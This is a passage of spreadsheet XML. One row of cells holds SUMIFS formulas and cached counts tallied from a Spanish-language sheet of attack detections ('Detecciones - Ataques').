        <f>U28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>252</v>
      </c>
      <c r="V32" s="353">
        <f>V28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>39</v>
      </c>
      <c r="W32" s="353">
        <f>V28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>39</v>
      </c>
      <c r="X32" s="353">
        <f>X28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>24</v>
      </c>
      <c r="Y32" s="353">
        <f>Y28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>22</v>
      </c>
      <c r="Z32" s="353">
        <f>Z28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>9923</v>
      </c>
      <c r="AA32" s="353">
        <f>AA28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>727</v>
      </c>
      <c r="AB32" s="353">
        <f>AB28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>333</v>
      </c>
      <c r="AC32" s="353">
        <f>AC28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>148</v>
      </c>
      <c r="AD32" s="353">
        <f>AD28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1017</v>
      </c>
      <c r="AE32" s="353">
        <f>AE28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>114</v>
      </c>
      <c r="AF32" s="354">
        <f>AF28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>930</v>
      </c>
      <c r="AG32" s="271"/>
      <c r="AH32" s="352" t="s">
        <v>2472</v>
      </c>
      <c r="AI32" s="355">
        <f>AI28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>2058</v>
      </c>
      <c r="AJ32" s="355">
        <f>AJ28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="AK32" s="355">
        <f>AK28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>59</v>
      </c>
      <c r="AL32" s="355">
        <f>AL28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>7</v>
      </c>
      <c r="AM32" s="355">
        <f>AM28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="AN32" s="355">
        <f>AN28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="AO32" s="355">
        <f>AO28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="AP32" s="355">
        <f>AP28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="AQ32" s="355">
        <f>AQ28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>130</v>
      </c>
      <c r="AR32" s="355">
        <f>AR28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>5</v>
      </c>
      <c r="AS32" s="355">
        <f>AS28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="AT32" s="355">
        <f>AT28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>9</v>
      </c>
      <c r="AU32" s="355">
        <f>AU28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>90</v>
      </c>
      <c r="AV32" s="355">
        <f>AV28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>18</v>
      </c>
      <c r="AW32" s="355">
        <f>AW28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="AX32" s="355">
        <f>AX28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>27</v>
      </c>
      <c r="AY32" s="355">
        <f>AY28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="AZ32" s="355">
        <f>AZ28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>10</v>
      </c>
      <c r="BA32" s="355">
        <f>BA28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>2</v>
      </c>
      <c r="BB32" s="355">
        <f>BB28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="BC32" s="355">
        <f>BC28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>3</v>
      </c>
      <c r="BD32" s="355">
        <f>BD28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="BE32" s="355">
        <f>BE28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>7</v>
      </c>
      <c r="BF32" s="355">
        <f>BF28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>11</v>
      </c>
      <c r="BG32" s="355">
        <f>BG28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>3</v>
      </c>
      <c r="BH32" s="355">
        <f>BH28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="BI32" s="355">
        <f>BI28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="BJ32" s="355">
        <f>BJ28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>3</v>
      </c>
      <c r="BK32" s="355">
        <f>BK28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>10</v>
      </c>
      <c r="BL32" s="355">
        <f>BL28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>11</v>
      </c>
      <c r="BM32" s="355">
        <f>BM28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>3297</v>
      </c>
      <c r="BN32" s="355">
        <f>BN28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>6615</v>
      </c>
      <c r="BO32" s="355">
        <f>BO28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="BP32" s="355">
        <f>BP28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="BQ32" s="355">
        <f>BQ28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>200</v>
      </c>
      <c r="BR32" s="355">
        <f>BR28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="BS32" s="355">
        <f>BS28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>6</v>
      </c>
      <c r="BT32" s="355">
        <f>BT28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>2</v>
      </c>
      <c r="BU32" s="355">
        <f>BU28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="BV32" s="355">
        <f>BV28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="BW32" s="355">
        <f>BW28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>7</v>
      </c>
      <c r="BX32" s="355">
        <f>BX28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="BY32" s="355">
        <f>BY28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>147</v>
      </c>
      <c r="BZ32" s="355">
        <f>BZ28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>266</v>
      </c>
      <c r="CA32" s="355">
        <f>CA28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="CB32" s="355">
        <f>CB28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>3</v>
      </c>
      <c r="CC32" s="355">
        <f>CC28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>2</v>
      </c>
      <c r="CD32" s="355">
        <f>CD28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CE32" s="355">
        <f>CE28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="CF32" s="355">
        <f>CF28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>2</v>
      </c>
      <c r="CG32" s="355">
        <f>CG28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CH32" s="355">
        <f>CH28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>15</v>
      </c>
      <c r="CI32" s="355">
        <f>CI28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>88</v>
      </c>
      <c r="CJ32" s="355">
        <f>CJ28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>2</v>
      </c>
      <c r="CK32" s="355">
        <f>CK28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>12</v>
      </c>
      <c r="CL32" s="355">
        <f>CL28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="CM32" s="355">
        <f>CM28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>188</v>
      </c>
      <c r="CN32" s="355">
        <f>CN28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CO32" s="355">
        <f>CO28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>27</v>
      </c>
      <c r="CP32" s="355">
        <f>CP28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>113</v>
      </c>
      <c r="CQ32" s="355">
        <f>CQ28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>7</v>
      </c>
      <c r="CR32" s="355">
        <f>CR28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="CS32" s="355">
        <f>CS28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="CT32" s="355">
        <f>CT28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1002</v>
      </c>
      <c r="CU32" s="355">
        <f>CU28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="CV32" s="355">
